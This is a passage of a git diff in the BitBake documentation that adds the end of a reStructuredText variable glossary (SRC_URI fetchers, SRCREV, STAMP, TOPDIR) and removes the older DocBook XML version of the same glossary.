+         the :term:`FILESPATH` variable.
+
+      -  ``bzr://`` : Fetches files from a Bazaar revision control
+         repository.
+
+      -  ``git://`` : Fetches files from a Git revision control
+         repository.
+
+      -  ``osc://`` : Fetches files from an OSC (OpenSUSE Build service)
+         revision control repository.
+
+      -  ``repo://`` : Fetches files from a repo (Git) repository.
+
+      -  ``http://`` : Fetches files from the Internet using HTTP.
+
+      -  ``https://`` : Fetches files from the Internet using HTTPS.
+
+      -  ``ftp://`` : Fetches files from the Internet using FTP.
+
+      -  ``cvs://`` : Fetches files from a CVS revision control
+         repository.
+
+      -  ``hg://`` : Fetches files from a Mercurial (``hg``) revision
+         control repository.
+
+      -  ``p4://`` : Fetches files from a Perforce (``p4``) revision
+         control repository.
+
+      -  ``ssh://`` : Fetches files from a secure shell.
+
+      -  ``svn://`` : Fetches files from a Subversion (``svn``) revision
+         control repository.
+
+      Here are some additional options worth mentioning:
+
+      -  ``unpack`` : Controls whether or not to unpack the file if it is
+         an archive. The default action is to unpack the file.
+
+      -  ``subdir`` : Places the file (or extracts its contents) into the
+         specified subdirectory. This option is useful for unusual tarballs
+         or other archives that do not have their files already in a
+         subdirectory within the archive.
+
+      -  ``name`` : Specifies a name to be used for association with
+         ``SRC_URI`` checksums when you have more than one file specified
+         in ``SRC_URI``.
+
+      -  ``downloadfilename`` : Specifies the filename used when storing
+         the downloaded file.
+
+   :term:`SRCDATE`
+      The date of the source code used to build the package. This variable
+      applies only if the source was fetched from a Source Code Manager
+      (SCM).
+
+   :term:`SRCREV`
+      The revision of the source code used to build the package. This
+      variable applies only when using Subversion, Git, Mercurial and
+      Bazaar. If you want to build a fixed revision and you want to avoid
+      performing a query on the remote repository every time BitBake parses
+      your recipe, you should specify a ``SRCREV`` that is a full revision
+      identifier and not just a tag.
+
+   :term:`SRCREV_FORMAT`
+      Helps construct valid :term:`SRCREV` values when
+      multiple source controlled URLs are used in
+      :term:`SRC_URI`.
+
+      The system needs help constructing these values under these
+      circumstances. Each component in the ``SRC_URI`` is assigned a name
+      and these are referenced in the ``SRCREV_FORMAT`` variable. Consider
+      an example with URLs named "machine" and "meta". In this case,
+      ``SRCREV_FORMAT`` could look like "machine_meta" and those names
+      would have the SCM versions substituted into each position. Only one
+      ``AUTOINC`` placeholder is added and if needed. And, this placeholder
+      is placed at the start of the returned string.
+
+   :term:`STAMP`
+      Specifies the base path used to create recipe stamp files. The path
+      to an actual stamp file is constructed by evaluating this string and
+      then appending additional information.
+
+   :term:`STAMPCLEAN`
+      Specifies the base path used to create recipe stamp files. Unlike the
+      :term:`STAMP` variable, ``STAMPCLEAN`` can contain
+      wildcards to match the range of files a clean operation should
+      remove. BitBake uses a clean operation to remove any other stamps it
+      should be removing when creating a new stamp.
+
+   :term:`SUMMARY`
+      A short summary for the recipe, which is 72 characters or less.
+
+   :term:`SVNDIR`
+      The directory in which files checked out of a Subversion system are
+      stored.
+
+   :term:`T`
+      Points to a directory were BitBake places temporary files, which
+      consist mostly of task logs and scripts, when building a particular
+      recipe.
+
+   :term:`TOPDIR`
+      Points to the build directory. BitBake automatically sets this
+      variable.
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.xml
deleted file mode 100644
index 4c29b2464f..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.xml
+++ /dev/null
@@ -1,2537 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<!-- Dummy chapter -->
-<chapter id='ref-bb-variables-glos'>
-
-<title>Variables Glossary</title>
-
-<para>
-    This chapter lists common variables used by BitBake and gives an overview
-    of their function and contents.
-</para>
-
-<note>
-    Following are some points regarding the variables listed in this glossary:
-    <itemizedlist>
-        <listitem><para>The variables listed in this glossary
-            are specific to BitBake.
-            Consequently, the descriptions are limited to that context.
-            </para></listitem>
-        <listitem><para>Also, variables exist in other systems that use BitBake
-            (e.g. The Yocto Project and OpenEmbedded) that have names identical
-            to those found in this glossary.
-            For such cases, the variables in those systems extend the
-            functionality of the variable as it is described here in
-            this glossary.
-            </para></listitem>
-        <listitem><para>Finally, there are variables mentioned in this
-            glossary that do not appear in the BitBake glossary.
-            These other variables are variables used in systems that use
-            BitBake.
-            </para></listitem>
-    </itemizedlist>
-</note>
-
-<glossary id='ref-bb-variables-glossary'>
-
-    <para>
-       <link linkend='var-bb-ASSUME_PROVIDED'>A</link>
-       <link linkend='var-bb-B'>B</link>
-       <link linkend='var-bb-CACHE'>C</link>
-       <link linkend='var-bb-DEFAULT_PREFERENCE'>D</link>
-       <link linkend='var-bb-EXCLUDE_FROM_WORLD'>E</link>
-       <link linkend='var-bb-FAKEROOT'>F</link>
-       <link linkend='var-bb-GITDIR'>G</link>
-       <link linkend='var-bb-HGDIR'>H</link>
-       <link linkend='var-bb-INHERIT'>I</link>
-<!--               <link linkend='var-glossary-j'>J</link> -->
-<!--       <link linkend='var-KARCH'>K</link> -->
-       <link linkend='var-bb-LAYERDEPENDS'>L</link>
-       <link linkend='var-bb-MIRRORS'>M</link>
-<!--               <link linkend='var-glossary-n'>N</link> -->
-       <link linkend='var-bb-OVERRIDES'>O</link>
-       <link linkend='var-bb-P4DIR'>P</link>
-<!--       <link linkend='var-QMAKE_PROFILES'>Q</link> -->
-       <link linkend='var-bb-RDEPENDS'>R</link>
-       <link linkend='var-bb-SECTION'>S</link>
-       <link linkend='var-bb-T'>T</link>
-<!--       <link linkend='var-UBOOT_CONFIG'>U</link> -->
-<!--               <link linkend='var-glossary-v'>V</link> -->
-<!--       <link linkend='var-WARN_QA'>W</link> -->
-<!--               <link linkend='var-glossary-x'>X</link> -->
-<!--               <link linkend='var-glossary-y'>Y</link> -->
-<!--               <link linkend='var-glossary-z'>Z</link>-->
-    </para>
-
-    <glossdiv id='var-bb-glossary-a'><title>A</title>
-
-        <glossentry id='var-bb-ASSUME_PROVIDED'><glossterm>ASSUME_PROVIDED</glossterm>
-            <glossdef>
-                <para>
-                    Lists recipe names
-                    (<link linkend='var-bb-PN'><filename>PN</filename></link>
-                    values) BitBake does not attempt to build.
-                    Instead, BitBake assumes these recipes have already been
-                    built.
-                </para>
-
-                <para>
-                    In OpenEmbedded-Core, <filename>ASSUME_PROVIDED</filename>
-                    mostly specifies native tools that should not be built.
-                    An example is <filename>git-native</filename>, which
-                    when specified allows for the Git binary from the host to
-                    be used rather than building
-                    <filename>git-native</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-
-    <glossdiv id='var-bb-glossary-b'><title>B</title>
-
-        <glossentry id='var-bb-B'><glossterm>B</glossterm>
-            <glossdef>
-                <para>
-                    The directory in which BitBake executes functions
-                    during a recipe's build process.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_ALLOWED_NETWORKS'><glossterm>BB_ALLOWED_NETWORKS</glossterm>
-            <glossdef>
-                <para>
-                    Specifies a space-delimited list of hosts that the fetcher
-                    is allowed to use to obtain the required source code.
-                    Following are considerations surrounding this variable:
-                    <itemizedlist>
-                        <listitem><para>
-                            This host list is only used if
-                            <link linkend='var-bb-BB_NO_NETWORK'><filename>BB_NO_NETWORK</filename></link>
-                            is either not set or set to "0".
-                            </para></listitem>
-                        <listitem><para>
-                            Limited support for the "<filename>*</filename>"
-                            wildcard character for matching against the
-                            beginning of host names exists.
-                            For example, the following setting matches
-                            <filename>git.gnu.org</filename>,
-                            <filename>ftp.gnu.org</filename>, and
-                            <filename>foo.git.gnu.org</filename>.
-                            <literallayout class='monospaced'>
-     BB_ALLOWED_NETWORKS = "*.gnu.org"
-                            </literallayout>
-                            <note><title>Important</title>
-                                <para>The use of the "<filename>*</filename>"
-                                character only works at the beginning of
-                                a host name and it must be isolated from
-                                the remainder of the host name.
-                                You cannot use the wildcard character in any
-                                other location of the name or combined with
-                                the front part of the name.</para>
-
-                                <para>For example,
-                                <filename>*.foo.bar</filename> is supported,
-                                while <filename>*aa.foo.bar</filename> is not.
-                                </para>
-                            </note>
-                            </para></listitem>
-                        <listitem><para>
-                            Mirrors not in the host list are skipped and
-                            logged in debug.
-                            </para></listitem>
-                        <listitem><para>
-                            Attempts to access networks not in the host list
-                            cause a failure.
-                            </para></listitem>
-                    </itemizedlist>
-                    Using <filename>BB_ALLOWED_NETWORKS</filename> in
-                    conjunction with
-                    <link linkend='var-bb-PREMIRRORS'><filename>PREMIRRORS</filename></link>
-                    is very useful.
-                    Adding the host you want to use to
-                    <filename>PREMIRRORS</filename> results in the source code
-                    being fetched from an allowed location and avoids raising
-                    an error when a host that is not allowed is in a
-                    <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>
-                    statement.
-                    This is because the fetcher does not attempt to use the
-                    host listed in <filename>SRC_URI</filename> after a
-                    successful fetch from the
-                    <filename>PREMIRRORS</filename> occurs.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_CONSOLELOG'><glossterm>BB_CONSOLELOG</glossterm>
-            <glossdef>
-                <para>
-                    Specifies the path to a log file into which BitBake's user
-                    interface writes output during the build.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_CURRENTTASK'><glossterm>BB_CURRENTTASK</glossterm>
-            <glossdef>
-                <para>
-                    Contains the name of the currently running task.
-                    The name does not include the
-                    <filename>do_</filename> prefix.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_DANGLINGAPPENDS_WARNONLY'><glossterm>BB_DANGLINGAPPENDS_WARNONLY</glossterm>
-            <glossdef>
-                <para>
-                    Defines how BitBake handles situations where an append
-                    file (<filename>.bbappend</filename>) has no
-                    corresponding recipe file (<filename>.bb</filename>).
-                    This condition often occurs when layers get out of sync
-                    (e.g. <filename>oe-core</filename> bumps a
-                    recipe version and the old recipe no longer exists and the
-                    other layer has not been updated to the new version
-                    of the recipe yet).
-                </para>
-
-                <para>
-                    The default fatal behavior is safest because it is
-                    the sane reaction given something is out of sync.
-                    It is important to realize when your changes are no longer
-                    being applied.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_DEFAULT_TASK'><glossterm>BB_DEFAULT_TASK</glossterm>
-            <glossdef>
-                <para>
-                    The default task to use when none is specified (e.g.
-                    with the <filename>-c</filename> command line option).
-                    The task name specified should not include the
-                    <filename>do_</filename> prefix.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_DISKMON_DIRS'><glossterm>BB_DISKMON_DIRS</glossterm>
-            <glossdef>
-                <para>
-                    Monitors disk space and available inodes during the build
-                    and allows you to control the build based on these
-                    parameters.
-                </para>
-
-                <para>
-                    Disk space monitoring is disabled by default.
-                    When setting this variable, use the following form:
-                    <literallayout class='monospaced'>
-     BB_DISKMON_DIRS = "&lt;action&gt;,&lt;dir&gt;,&lt;threshold&gt; [...]"
-
-     where:
-
-        &lt;action&gt; is:
-           ABORT:     Immediately abort the build when
-                      a threshold is broken.
-           STOPTASKS: Stop the build after the currently
-                      executing tasks have finished when
-                      a threshold is broken.
-           WARN:      Issue a warning but continue the
-                      build when a threshold is broken.
-                      Subsequent warnings are issued as
-                      defined by the
-                      <link linkend='var-bb-BB_DISKMON_WARNINTERVAL'>BB_DISKMON_WARNINTERVAL</link> variable,
-                      which must be defined.
-
-        &lt;dir&gt; is:
-           Any directory you choose. You can specify one or
-           more directories to monitor by separating the
-           groupings with a space.  If two directories are
-           on the same device, only the first directory
-           is monitored.
-
-        &lt;threshold&gt; is:
-           Either the minimum available disk space,
-           the minimum number of free inodes, or
-           both.  You must specify at least one.  To
-           omit one or the other, simply omit the value.
-           Specify the threshold using G, M, K for Gbytes,
-           Mbytes, and Kbytes, respectively. If you do
-           not specify G, M, or K, Kbytes is assumed by
-           default.  Do not use GB, MB, or KB.
-                    </literallayout>
-                </para>
-
-                <para>
-                    Here are some examples:
-                    <literallayout class='monospaced'>
-     BB_DISKMON_DIRS = "ABORT,${TMPDIR},1G,100K WARN,${SSTATE_DIR},1G,100K"
-     BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},1G"
-     BB_DISKMON_DIRS = "ABORT,${TMPDIR},,100K"
-                    </literallayout>
-                    The first example works only if you also set
-                    the <link linkend='var-bb-BB_DISKMON_WARNINTERVAL'><filename>BB_DISKMON_WARNINTERVAL</filename></link> variable.
-                    This example causes the build system to immediately
-                    abort when either the disk space in <filename>${TMPDIR}</filename> drops
-                    below 1 Gbyte or the available free inodes drops below
-                    100 Kbytes.
-                    Because two directories are provided with the variable, the
-                    build system also issues a
-                    warning when the disk space in the
-                    <filename>${SSTATE_DIR}</filename> directory drops
-                    below 1 Gbyte or the number of free inodes drops
-                    below 100 Kbytes.
-                    Subsequent warnings are issued during intervals as
-                    defined by the <filename>BB_DISKMON_WARNINTERVAL</filename>
-                    variable.
-                </para>
-
-                <para>
-                    The second example stops the build after all currently
-                    executing tasks complete when the minimum disk space
-                    in the <filename>${TMPDIR}</filename>
-                    directory drops below 1 Gbyte.
-                    No disk monitoring occurs for the free inodes in this case.
-                </para>
-
-                <para>
-                    The final example immediately aborts the build when the
-                    number of free inodes in the <filename>${TMPDIR}</filename> directory
-                    drops below 100 Kbytes.
-                    No disk space monitoring for the directory itself occurs
-                    in this case.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_DISKMON_WARNINTERVAL'><glossterm>BB_DISKMON_WARNINTERVAL</glossterm>
-            <glossdef>
-                <para>
-                    Defines the disk space and free inode warning intervals.
-                </para>
-
-                <para>
-                    If you are going to use the
-                    <filename>BB_DISKMON_WARNINTERVAL</filename> variable, you must
-                    also use the
-                    <link linkend='var-bb-BB_DISKMON_DIRS'><filename>BB_DISKMON_DIRS</filename></link> variable
-                    and define its action as "WARN".
-                    During the build, subsequent warnings are issued each time
-                    disk space or number of free inodes further reduces by
-                    the respective interval.
-                </para>
-
-                <para>
-                    If you do not provide a <filename>BB_DISKMON_WARNINTERVAL</filename>
-                    variable and you do use <filename>BB_DISKMON_DIRS</filename> with
-                    the "WARN" action, the disk monitoring interval defaults to
-                    the following:
-                    <literallayout class='monospaced'>
-     BB_DISKMON_WARNINTERVAL = "50M,5K"
-                    </literallayout>
-                </para>
-
-                <para>
-                    When specifying the variable in your configuration file,
-                    use the following form:
-                    <literallayout class='monospaced'>
-     BB_DISKMON_WARNINTERVAL = "&lt;disk_space_interval&gt;,&lt;disk_inode_interval&gt;"
-
-     where:
-
-        &lt;disk_space_interval&gt; is:
-           An interval of memory expressed in either
-           G, M, or K for Gbytes, Mbytes, or Kbytes,
-           respectively. You cannot use GB, MB, or KB.
-
-        &lt;disk_inode_interval&gt; is:
-           An interval of free inodes expressed in either
-           G, M, or K for Gbytes, Mbytes, or Kbytes,
-           respectively. You cannot use GB, MB, or KB.
-                    </literallayout>
-                </para>
-
-                <para>
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     BB_DISKMON_DIRS = "WARN,${SSTATE_DIR},1G,100K"
-     BB_DISKMON_WARNINTERVAL = "50M,5K"
-                    </literallayout>
-                    These variables cause BitBake to
-                    issue subsequent warnings each time the available
-                    disk space further reduces by 50 Mbytes or the number
-                    of free inodes further reduces by 5 Kbytes in the
-                    <filename>${SSTATE_DIR}</filename> directory.
-                    Subsequent warnings based on the interval occur each time
-                    a respective interval is reached beyond the initial warning
-                    (i.e. 1 Gbytes and 100 Kbytes).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_ENV_WHITELIST'><glossterm>BB_ENV_WHITELIST</glossterm>
-            <glossdef>
-                <para>
-                    Specifies the internal whitelist of variables to allow
-                    through from the external environment into BitBake's
-                    datastore.
-                    If the value of this variable is not specified
-                    (which is the default), the following list is used:
-                    <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>,
-                    <link linkend='var-bb-BB_PRESERVE_ENV'><filename>BB_PRESERVE_ENV</filename></link>,
-                    <link linkend='var-bb-BB_ENV_WHITELIST'><filename>BB_ENV_WHITELIST</filename></link>,
-                    and
-                    <link linkend='var-bb-BB_ENV_EXTRAWHITE'><filename>BB_ENV_EXTRAWHITE</filename></link>.
-                    <note>
-                        You must set this variable in the external environment
-                        in order for it to work.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_ENV_EXTRAWHITE'><glossterm>BB_ENV_EXTRAWHITE</glossterm>
-            <glossdef>
-                <para>
-                    Specifies an additional set of variables to allow through
-                    (whitelist) from the external environment into BitBake's
-                    datastore.
-                    This list of variables are on top of the internal list
-                    set in
-                    <link linkend='var-bb-BB_ENV_WHITELIST'><filename>BB_ENV_WHITELIST</filename></link>.
-                    <note>
-                        You must set this variable in the external
-                        environment in order for it to work.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_FETCH_PREMIRRORONLY'><glossterm>BB_FETCH_PREMIRRORONLY</glossterm>
-            <glossdef>
-                <para>
-                    When set to "1", causes BitBake's fetcher module to only
-                    search
-                    <link linkend='var-bb-PREMIRRORS'><filename>PREMIRRORS</filename></link>
-                    for files.
-                    BitBake will not search the main
-                    <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>
-                    or
-                    <link linkend='var-bb-MIRRORS'><filename>MIRRORS</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_FILENAME'><glossterm>BB_FILENAME</glossterm>
-            <glossdef>
-                <para>
-                    Contains the filename of the recipe that owns the currently
-                    running task.
-                    For example, if the <filename>do_fetch</filename> task that
-                    resides in the <filename>my-recipe.bb</filename> is
-                    executing, the <filename>BB_FILENAME</filename> variable
-                    contains "/foo/path/my-recipe.bb".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_GENERATE_MIRROR_TARBALLS'><glossterm>BB_GENERATE_MIRROR_TARBALLS</glossterm>
-            <glossdef>
-                <para>
-                    Causes tarballs of the Git repositories, including the
-                    Git metadata, to be placed in the
-                    <link linkend='var-bb-DL_DIR'><filename>DL_DIR</filename></link>
-                    directory.
-                    Anyone wishing to create a source mirror would want to
-                    enable this variable.
-                </para>
-
-                <para>
-                    For performance reasons, creating and placing tarballs of
-                    the Git repositories is not the default action by BitBake.
-                    <literallayout class='monospaced'>
-     BB_GENERATE_MIRROR_TARBALLS = "1"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_HASHCONFIG_WHITELIST'><glossterm>BB_HASHCONFIG_WHITELIST</glossterm>
-            <glossdef>
-                <para>
-                    Lists variables that are excluded from base configuration
-                    checksum, which is used to determine if the cache can
-                    be reused.
-                </para>
-
-                <para>
-                    One of the ways BitBake determines whether to re-parse the
-                    main metadata is through checksums of the variables in the
-                    datastore of the base configuration data.
-                    There are variables that you typically want to exclude when
-                    checking whether or not to re-parse and thus rebuild the
-                    cache.
-                    As an example, you would usually exclude
-                    <filename>TIME</filename> and <filename>DATE</filename>
-                    because these variables are always changing.
-                    If you did not exclude them, BitBake would never reuse the
-                    cache.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_HASHBASE_WHITELIST'><glossterm>BB_HASHBASE_WHITELIST</glossterm>
-            <glossdef>
-                <para>
-                    Lists variables that are excluded from checksum and
-                    dependency data.
-                    Variables that are excluded can therefore change without
-                    affecting the checksum mechanism.
-                    A common example would be the variable for the path of
-                    the build.
-                    BitBake's output should not (and usually does not) depend
-                    on the directory in which it was built.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_HASHCHECK_FUNCTION'><glossterm>BB_HASHCHECK_FUNCTION</glossterm>
-            <glossdef>
-                <para>
-                    Specifies the name of the function to call during the
-                    "setscene" part of the task's execution in order to
-                    validate the list of task hashes.
-                    The function returns the list of setscene tasks that should
-                    be executed.
-                </para>
-
-                <para>
-                    At this point in the execution of the code, the objective
-                    is to quickly verify if a given setscene function is likely
-                    to work or not.
-                    It's easier to check the list of setscene functions in
-                    one pass than to call many individual tasks.
-                    The returned list need not be completely accurate.
-                    A given setscene task can still later fail.
-                    However, the more accurate the data returned, the more
-                    efficient the build will be.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_INVALIDCONF'><glossterm>BB_INVALIDCONF</glossterm>
-            <glossdef>
-                <para>
-                    Used in combination with the
-                    <filename>ConfigParsed</filename> event to trigger
-                    re-parsing the base metadata (i.e. all the
-                    recipes).
-                    The <filename>ConfigParsed</filename> event can set the
-                    variable to trigger the re-parse.
-                    You must be careful to avoid recursive loops with this
-                    functionality.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_LOGCONFIG'><glossterm>BB_LOGCONFIG</glossterm>
-            <glossdef>
-                <para>
-                    Specifies the name of a config file that contains the user
-                    logging configuration. See
-                    <link linkend="logging">Logging</link> for additional
-                    information
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_LOGFMT'><glossterm>BB_LOGFMT</glossterm>
-            <glossdef>
-                <para>
-                    Specifies the name of the log files saved into
-                    <filename>${</filename><link linkend='var-bb-T'><filename>T</filename></link><filename>}</filename>.
-                    By default, the <filename>BB_LOGFMT</filename> variable
-                    is undefined and the log file names get created using the
-                    following form:
-                    <literallayout class='monospaced'>
-     log.{task}.{pid}
-                    </literallayout>
-                    If you want to force log files to take a specific name,
-                    you can set this variable in a configuration file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_NICE_LEVEL'><glossterm>BB_NICE_LEVEL</glossterm>
-            <glossdef>
-                <para>
-                    Allows BitBake to run at a specific priority
-                    (i.e. nice level).
-                    System permissions usually mean that BitBake can reduce its
-                    priority but not raise it again.
-                    See
-                    <link linkend='var-bb-BB_TASK_NICE_LEVEL'><filename>BB_TASK_NICE_LEVEL</filename></link>
-                    for additional information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_NO_NETWORK'><glossterm>BB_NO_NETWORK</glossterm>
-            <glossdef>
-                <para>
-                    Disables network access in the BitBake fetcher modules.
-                    With this access disabled, any command that attempts to
-                    access the network becomes an error.
-                </para>
-
-                <para>
-                    Disabling network access is useful for testing source
-                    mirrors, running builds when not connected to the Internet,
-                    and when operating in certain kinds of firewall
-                    environments.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_NUMBER_THREADS'><glossterm>BB_NUMBER_THREADS</glossterm>
-            <glossdef>
-                <para>
-                    The maximum number of tasks BitBake should run in parallel
-                    at any one time.
-                    If your host development system supports multiple cores,
-                    a good rule of thumb is to set this variable to twice the
-                    number of cores.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_NUMBER_PARSE_THREADS'><glossterm>BB_NUMBER_PARSE_THREADS</glossterm>
-            <glossdef>
-                <para>
-                    Sets the number of threads BitBake uses when parsing.
-                    By default, the number of threads is equal to the number
-                    of cores on the system.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_ORIGENV'><glossterm>BB_ORIGENV</glossterm>
-            <glossdef>
-                <para>
-                    Contains a copy of the original external environment in
-                    which BitBake was run.
-                    The copy is taken before any whitelisted variable values
-                    are filtered into BitBake's datastore.
-                    <note>
-                        The contents of this variable is a datastore object
-                        that can be queried using the normal datastore
-                        operations.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_PRESERVE_ENV'><glossterm>BB_PRESERVE_ENV</glossterm>
-            <glossdef>
-                <para>
-                    Disables whitelisting and instead allows all variables
-                    through from the external environment into BitBake's
-                    datastore.
-                    <note>
-                        You must set this variable in the external
-                        environment in order for it to work.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_RUNFMT'><glossterm>BB_RUNFMT</glossterm>
-            <glossdef>
-                <para>
-                    Specifies the name of the executable script files
-                    (i.e. run files) saved into
-                    <filename>${</filename><link linkend='var-bb-T'><filename>T</filename></link><filename>}</filename>.
-                    By default, the <filename>BB_RUNFMT</filename> variable
-                    is undefined and the run file names get created using the
-                    following form:
-                    <literallayout class='monospaced'>
-     run.{task}.{pid}
-                    </literallayout>
-                    If you want to force run files to take a specific name,
-                    you can set this variable in a configuration file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_RUNTASK'><glossterm>BB_RUNTASK</glossterm>
-            <glossdef>
-                <para>
-                    Contains the name of the currently executing task.
-                    The value includes the "do_" prefix.
-                    For example, if the currently executing task is
-                    <filename>do_config</filename>, the value is
-                    "do_config".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_SCHEDULER'><glossterm>BB_SCHEDULER</glossterm>
-            <glossdef>
-                <para>
-                    Selects the name of the scheduler to use for the
-                    scheduling of BitBake tasks.
-                    Three options exist:
-                    <itemizedlist>
-                        <listitem><para><emphasis>basic</emphasis> -
-                            The basic framework from which everything derives.
-                            Using this option causes tasks to be ordered
-                            numerically as they are parsed.
-                            </para></listitem>
-                        <listitem><para><emphasis>speed</emphasis> -
-                            Executes tasks first that have more tasks
-                            depending on them.
-                            The "speed" option is the default.
-                            </para></listitem>
-                        <listitem><para><emphasis>completion</emphasis> -
-                            Causes the scheduler to try to complete a given
-                            recipe once its build has started.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_SCHEDULERS'><glossterm>BB_SCHEDULERS</glossterm>
-            <glossdef>
-                <para>
-                    Defines custom schedulers to import.
-                    Custom schedulers need to be derived from the
-                    <filename>RunQueueScheduler</filename> class.
-                </para>
-
-                <para>
-                    For information how to select a scheduler, see the
-                    <link linkend='var-bb-BB_SCHEDULER'><filename>BB_SCHEDULER</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_SETSCENE_DEPVALID'><glossterm>BB_SETSCENE_DEPVALID</glossterm>
-            <glossdef>
-                <para>
-                    Specifies a function BitBake calls that determines
-                    whether BitBake requires a setscene dependency to be met.
-                </para>
-
-                <para>
-                    When running a setscene task, BitBake needs to
-                    know which dependencies of that setscene task also need
-                    to be run.
-                    Whether dependencies also need to be run is highly
-                    dependent on the metadata.
-                    The function specified by this variable returns a
-                    "True" or "False" depending on whether the dependency needs
-                    to be met.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_SETSCENE_VERIFY_FUNCTION2'><glossterm>BB_SETSCENE_VERIFY_FUNCTION2</glossterm>
-            <glossdef>
-                <para>
-                    Specifies a function to call that verifies the list of
-                    planned task execution before the main task execution
-                    happens.
-                    The function is called once BitBake has a list of setscene
-                    tasks that have run and either succeeded or failed.
-                </para>
-
-                <para>
-                    The function allows for a task list check to see if they
-                    make sense.
-                    Even if BitBake was planning to skip a task, the
-                    returned value of the function can force BitBake to run
-                    the task, which is necessary under certain metadata
-                    defined circumstances.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_SIGNATURE_EXCLUDE_FLAGS'><glossterm>BB_SIGNATURE_EXCLUDE_FLAGS</glossterm>
-            <glossdef>
-                <para>
-                    Lists variable flags (varflags)
-                    that can be safely excluded from checksum
-                    and dependency data for keys in the datastore.
-                    When generating checksum or dependency data for keys in the
-                    datastore, the flags set against that key are normally
-                    included in the checksum.
-                </para>
-
-                <para>
-                    For more information on varflags, see the
-                    "<link linkend='variable-flags'>Variable Flags</link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_SIGNATURE_HANDLER'><glossterm>BB_SIGNATURE_HANDLER</glossterm>
-            <glossdef>
-                <para>
-                    Defines the name of the signature handler BitBake uses.
-                    The signature handler defines the way stamp files are
-                    created and handled, if and how the signature is
-                    incorporated into the stamps, and how the signature
-                    itself is generated.
-                </para>
-
-                <para>
-                    A new signature handler can be added by injecting a class
-                    derived from the
-                    <filename>SignatureGenerator</filename> class into the
-                    global namespace.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_SRCREV_POLICY'><glossterm>BB_SRCREV_POLICY</glossterm>
-            <glossdef>
-                <para>
-                    Defines the behavior of the fetcher when it interacts with
-                    source control systems and dynamic source revisions.
-                    The <filename>BB_SRCREV_POLICY</filename> variable is
-                    useful when working without a network.
-                </para>
-
-                <para>
-                    The variable can be set using one of two policies:
-                    <itemizedlist>
-                        <listitem><para><emphasis>cache</emphasis> -
-                            Retains the value the system obtained previously
-                            rather than querying the source control system
-                            each time.
-                            </para></listitem>
-                        <listitem><para><emphasis>clear</emphasis> -
-                            Queries the source controls system every time.
-                            With this policy, there is no cache.
-                            The "clear" policy is the default.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_STAMP_POLICY'><glossterm>BB_STAMP_POLICY</glossterm>
-            <glossdef>
-                <para>
-                    Defines the mode used for how timestamps of stamp files
-                    are compared.
-                    You can set the variable to one of the following modes:
-                    <itemizedlist>
-                        <listitem><para><emphasis>perfile</emphasis> -
-                            Timestamp comparisons are only made
-                            between timestamps of a specific recipe.
-                            This is the default mode.
-                            </para></listitem>
-                        <listitem><para><emphasis>full</emphasis> -
-                            Timestamp comparisons are made for all
-                            dependencies.
